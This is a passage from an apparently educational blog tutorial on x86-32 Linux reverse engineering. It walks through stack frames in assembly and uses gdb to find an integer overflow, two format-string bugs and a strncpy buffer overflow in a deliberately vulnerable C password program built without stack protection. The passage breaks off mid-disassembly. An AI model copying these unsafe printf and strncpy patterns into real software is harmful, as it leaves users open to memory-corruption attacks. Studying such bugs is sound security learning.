class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"push/span span class="nb"eax/span/span span class="code-line"span class="nf"push/span span class="mh"0x80487f0/span/span span class="code-line"span class="nf"push/span span class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/span/span span class="code-line"/code/pre/div /td/tr/table pHere the value is the EAX register is being strongpushed/strong onto the stack as the third argument (or "ARG 3" in our diagram), then the static value code0x80487f0/code as the second argument and finally EBP+c (or EBP+12, which is usually the second argument to the current function) as the first argument./p pThe codepush/code instruction automatically adjusts the value of ESP accordingly but it can also be done manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"sub/span span class="nb"esp/spanspan class="p",/span span class="mh"0xc/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"8/spanspan class="p"],/span span class="nb"eax/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"4/spanspan class="p"],/span span class="mh"0x80487f0/span/span span class="code-line"span class="nf"mov/span span class="p"[/spanspan class="nb"esp/spanspan class="p"],/span span class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/span/span span class="code-line"/code/pre/div /td/tr/table pThis set of instructions are functionally the same as the previous. These are followed by a codecall/code instruction and after the call instruction our stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe codecall/code instruction autmatically strongpushes/strong the memory address of the next instruction onto the stack. This is done so that when a function returns the application knows where to start executing instructions./p pInside the function that we have just called we start executing that functions prologue. First there is a codepush ebp/code instruction which does this to the stack:/p pimg src="/assets/images/x86-32-linux/stack3.jpg" width="300"/p pAfter that it executes codemov ebp, esp/code:/p pimg src="/assets/images/x86-32-linux/stack4.jpg" width="300"/p pLastly any space for needed for local variables is subtracted from ESP (codesub esp, 0x8/code), so our stack ends up like this:/p pimg src="/assets/images/x86-32-linux/stack5.jpg" width="300"/p pEBP always points to the start of the current functions stack frame and ESP to the top of the stack so if we call another function inside the current function the same process would happen./p pThe functions epilogue does the opposite, in the application we are debugging it just have to codeleave/code instruction. The codeleave/code instruction automates the cleanup of the stack frame./p pIn our example stack, the codeleave/code function would be equivalent to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"add/span span class="nb"esp/spanspan class="p",/span span class="mh"0x8/span/span span class="code-line"span class="nf"pop/span span class="nb"ebp/span/span span class="code-line"/code/pre/div /td/tr/table pThis would bring our stack frame back to this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pAnd then the final coderet/code instruction would remove the strongRET ADDR/strong from the stack setting everything back to how it was before the function call, coderet/code essentially does codepop eip/code./p h2Juicy Bits Continued/h2 pNow that we understand how the stack works we can have a look at that second call to codeprintf/code. The first argument to codeprintf/code is always the format string so when looking for a format string vulnerability we are trying to figure out if we can control the first argument./p pThe relevant lines that setup and call codeprintf/code are:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pThese 4 lines of code is actually line 18 in the source of the application. Line 1 moves the second argument (codeebp+0xc/code) (the second argument is always +C or +12 because EBP points to the old EBP, +4 points to the return address and +8 points to the first argument) into EAX./p pIn C the second argument to the main function is a list of pointers to the actual application arguments./p pBecause this argument is an array of pointers, line 2 moves the first pointer in this array into EAX (this normally points to the path of the application itself)./p pThis pointer is moved to the address pointed to by ESP (the top of the stack) and finally codeprintf/code is called. This shows that only 1 argument was given and that argument is the application path./p pWe can check this using codegdb/code but first there was a conditional statement which determined if this code got executed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="x" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the codeif/code statement on line 16 of the source code./p pLine 1 compares the first argument codeebp+0x8/code, with 1 and jumps to code0x804864c/code if the first argument is greater than 1. As you can see the assembly condition is the opposite to what is in the source code, this is often the case./p pIn C the first argument to the main function is the number of arguments give to the application on the command line so to enter the section of code we want to analyse we just need to give the application 1 argument (the name of the application is considered the first argument so there is always at least 1)./p h3Integer Overflow/h3 pThe codejg/code instruction means that the numbers that are being compared are signed (it would be codeja/code if they were unsigned) and because there is no bound checking done on codeebp+0x8/code, it is vulnerable to an integer overflow:/p pI wanted to demostrate this as soon as I realised but because it is an integer I need to send at least 2147483647 arguments, I couldn't do this on my test machine because there just isn't enough RAM./p pSo in the name of science, I rewrote the application so that the codeargc/code argument (or the number of arguments passed to the main function) is a codechar/code instead, here is my new application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere is the quick demonstration:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/home/testuser# /spangcc -z execstack -fno-stack-protector -o app-intof app-intof.c /span span class="code-line"span class="gp"[email protected]:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*126#39;/spanspan class="o")/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*127#39;/spanspan class="o")/span/span span class="code-line"span class="go"Usage: ./app-intof lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat is happening here is that the argument codeargc/code is being interpreted as a signed char and the max value for this type of variable is 127:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/home/testuser# /spangrep SCHAR_MAX /usr/include/limits.h /span span class="code-line"span class="gp"# /spandefine SCHAR_MAX span class="m"127/span/span span class="code-line"span class="gp"# /spandefine CHAR_MAX SCHAR_MAX/span span class="code-line"/code/pre/div /td/tr/table pAs the application is the first argument, we can have another 126 argument before the variable overflows and becomes -128, which is obviously smaller than 2./p h2Back To The Juicy Bits/h2 pSo now we know how to get to the code we want to analyse, which is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pLet's set a breakpoint on line 1 here (or code0x08048627/code) and run the application without any arguments./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048627/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048627/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/testuser/app /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048627 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048627 to 0x8048631:/span/span span class="code-line"span class="go"=gt; 0x08048627 lt;main+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;main+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;main+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;main+35gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw $ebp+0xc/span/span span class="code-line"span class="go"0xbfc674f4: 0xbfc67594/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw 0xbfc67594/span/span span class="code-line"span class="go"0xbfc67594: 0xbfc6795f/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbfc6795f/span/span span class="code-line"span class="go"0xbfc6795f: quot;/home/testuser/appquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows that our assumptions were correct and that there is likely a format string vulnerability here which we can exploit by chaning the name of the application (or creating a symlink as in a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a./p pWe also have a very similar set of codeprintf/code calls towards the end of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="x" 0x0804866e lt;+98gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"span class="x" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804867e lt;+114gt;: call 0x8048470 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pWe are interested in the second codeprintf/code here but to figure out how to get to it we need to have a look at the memory at code0x8048804/code which is printed just before./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048804/span/span span class="code-line"span class="go"0x8048804: quot;Wrong password: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get to this section of code when we give a wrong password. The call to the codeprintf/code in question is the same as previous except 4 is added to EAX before the pointer is followed. This suggests the second argument is being printed (also the previous codeprintf/code supports our theory), but let's check./p pLet's set a breakpoint and examine the memory again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"info breakpoints/span/span span class="code-line"span class="go"Num Type Disp Enb Address What/span/span span class="code-line"span class="go"1 breakpoint keep y 0x08048627 lt;main+27gt;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804867b/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804867b/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r ABC/span/span span class="code-line"span class="go"Starting program: /home/testuser/app ABC/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804867b in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $eax/span/span span class="code-line"span class="go"0xbffff96d: quot;ABCquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the second format string vulnerability./p h2Buffer Overflow/h2 pSo far we have found an integer overflow and 2 format string vulnerabilities./p pNext we should look over the codecheckpass/code function which is called on line 23 of the disassembly above. Here is the relevant instructions related to the call to codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe've already seen a set of instructions that were exactly the same as this, the second call to codeprintf/code, so this function takes 1 argument, the second argument to the application./p pHere is the disassembly of codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble checkpass/span/span span class="code-line"span class="go"Dump of assembler code for function checkpass:/span/span span class="code-line"span class="go" 0x080486a2 lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x080486a3 lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x080486a5 lt;+3gt;: sub esp,0x228/span/span span class="code-line"span class="go" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="go" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="go" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486cd lt;+43gt;: call 0x8048510 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486d2 lt;+48gt;: mov DWORD PTR [esp+0x4],0x8048815/span/span span class="code-line"span class="go" 0x080486da lt;+56gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486e0 lt;+62gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486e3 lt;+65gt;: call 0x8048460 lt;[email protected];/span/span span class="code-line"span class="go" 0x080486e8 lt;+70gt;: mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="go" 0x080486eb lt;+73gt;: mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="go" 0x080486ee lt;+76gt;: leave /span/span span class="code-line"span class="go" 0x080486ef lt;+77gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pIn the prologue, 0x228 bytes (or 552 bytes) are reserved for local variables and function call arguments./p pThe interesting call here is the call to codestrncpy/code but we need to examine the call to codestrlen/code first because it looks like output is the third argument to codestrncpy/code./p pThe call to codestrlen/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;[email protected];/span/span span class="code-line"/code/pre/div /td/tr/table pIt's clear the first argument is being used as the argument to codestrlen/code. Return values are normally passed using the EAX register./p pHere is the call to codestrncpy/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="x" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 